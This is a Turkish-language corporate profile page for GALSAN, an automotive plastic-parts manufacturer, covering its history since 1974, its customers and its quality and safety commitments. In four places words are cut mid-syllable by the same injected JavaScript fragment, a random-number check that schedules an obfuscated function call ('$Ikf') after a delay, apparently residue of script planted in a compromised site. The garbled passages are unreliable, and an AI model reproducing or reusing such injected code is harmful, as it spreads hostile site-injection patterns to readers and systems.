KURUMSAL PROFİL / Bugün GALSAN

 

 

Yönetim, üretim ve hizmet
anlayışında güven

 

 

Deneyim, bilgi ve
teknoloji ile gelişim

Yeni fikirlere açık ve katma değer yaratan

 

 

Yan Sanayide Köklü Geçmiş,
45 Yıllık Deneyim

GALSAN 1974 yılında kurulan Galsan Plastik Otomotiv Endüstrisi için plastik parçalar üzerine Ar-Ge ve üretim faaliyetleri gerçekleştirmektedir. Uluslararası niteliği, üretim yelpazesinin genişliği, yürütmekte olduğu Ar-Ge ve Tasarım çalışmaları ve son teknoloji ile donatılmış yeni makine parkı ile Toyota, Mercedes, Ford, Honda gibi dünya çapında bilinirliği olan firmalara parça üreticisi olarak hizmet vermektedir.

Kuruluştan Bugüne GALSAN

 

1974 yılında kurulan GALSAN, Türkiye’de sanayiciliğin yeni yeni gelişmeye başladığı bu dönemde “plastik enjeksiyon” alanlarında üretim çalışmalarına başladı. 1980’lere gelindiğinde üretim ve hizmet proseslerinde uzmanlaşan ve beyaz eşya sektörünün lider hizmet sağlayıcılarından biri haline gelen GALSAN, bu alandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaki çalışmalarını 1990’ların ortasına kadar sürdürdü.
Bu dönem itibariyle Şirket; üretim süreçlerinde önemli bir deneyim, uzmanlık ve profesyonel bir birikim elde etti.

Otomotiv Sanayi’ne Geçiş

2000’li yılların başında otomotiv sanayinin Türkiye’de kendine yer bulmaya başlamasıyla birlikte gelişim gösteren otomotiv yan sanayi alanındaki fırsatları zamanında gören GALSAN, 2000 yılı itibariyle beyaz eşya sektörüne verdiği hizmetlerin yanı sıra otomotiv sanayii için de çalışıp üretmeye başladı.
Dönemin ekonomik gelişmelerini kendi faaliyet alanları çerçevesinde stratejik olarak iyi okuyup doğru analiz eden GALSAN, Gümrük Birliği anlaşmasının da sağladığı fırsatları değerlendirerek stratejik bir kararla otomotiv yan sanayi alanındaki çalışmalarına ağırlık verdi ve büyümeye devam etti.

GALSAN’da Yeni Dönem Üretime, Teknolojiye, İnsana Yatırım

Otomotivde Mercedes Almanya ve Toyota için aynı andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anda üretim yapmaya başlayan GALSAN’ın hizmet verdiği kuruluşlara kısa zaman içerisinde, Honda, Tofaş ve Ford eklendi. Bu süreç itibariyle, otomotiv sektörüne doğru ve emin adımlarla giriş yapan GALSAN, insan kaynağını, sermayesini, tüm fiziksel şartlarını otomotiv yan sanayi için üretim yapmak üzere konumlamaya başladı.
Alınan bu stratejik kararı takiben 2008 küresel ekonomik krizinin etkilerini minimum düzeyde tutmak üzere pozisyon alan Kuruluş, tüm dünya için oldukça zorlu geçen bu sürecin ardından, 2009 yılı itibariyle %100 otomotiv sanayi için çalışmaya başladı.

Üretim ve Kalite Odaklı Yönetim Anlayışı

2013 yılına gelindiğinde GALSAN’da yepyeni bir dönem başladı. Çalışmaların merkezine üretim ve kalite odaklı bir yönetim anlayışı yerleştirildi ve operasyonel performansta optimumun yakalanması daimi hedef haline getirildi. Bu anlayışın benimsenmesiyle eş zamanlı olarak GALSAN mevcut müşterileri ile işbirliklerini daha da sağlamlaştırıp yeni çalışmalara imza atarken, yeni markalara da hizmet vermek üzere önemli adımlar attı.
Şirket bugün, kazandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andığı dinamik ve yenilikçi yapısıyla ve son teknoloji ile donatılmış yeni makine parkı sayesinde yılda 20 milyon parça üretim kapasitesine ulaşmış bulunuyor.

Taahhütlerimiz ve Sorumluluklarımız

Önceliğimiz İnsan

Ürünlerimizi ve üretim süreçlerimizi sürekli geliştirerek, iş güvenliğini, sağlığını ve çalışan memnuniyetini sağlamak
Çevremizi koruyarak ve yasal düzenlemelerle uyum içerisinde doğaya saygılı olmak

Operasyonlarda Performans

Maliyetlerimizi aşağıya çekerek, enerji, ham-madde ve doğal kaynaklarımızı en yüksek verimlilikle kullanmak, atıklarımızı azaltmak, israfları yok etmek ve geri dönüşümü sağlamak
Fabrika sınırları içerisinde tüm üretim faaliyetleri, ürün ve hizmetlerden kaynaklanabilecek riskleri azaltmak
Kalite, teslimat ve maliyet isteklerini karşılayarak müşteri memnuniyeti sağlamak
‘’0’’ hata hedefini benimseyerek üretim süreçlerimizi ve ürünlerimizi sürekli iyileştirmek

Sürdürülebilir Büyüme

Hoshin Kanri yöntemini kullanarak sürekli iyileşmeyi sağlamak
Müşterilerimize sürekli yeni ürünler ve yeni üretim süreçleri sunmak
Günlük ve aylık göstergelerimiz, ürünlerimizin uygunluğunu bütün fonksiyon ve özellikleri dahilinde ölçümlemektedirler
Bölüm Yöneticileri, ’’Entegre Yönetim Sistemi’’ şeklinin tüm çalışanlar tarafından anlaşıldığını ve taahhütlerin uygulandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andığını takip eder.
Kalite Yöneticiliği, bu sistemin şirket içerisinde uygulanması ve sistemin iç/dış denetimlerde uygun bir
şekilde devam ettirilmesini sağlamak için temsilci olarak belirlenmiştir

Ali Seyhan
Yönetim Kurulu Başkanı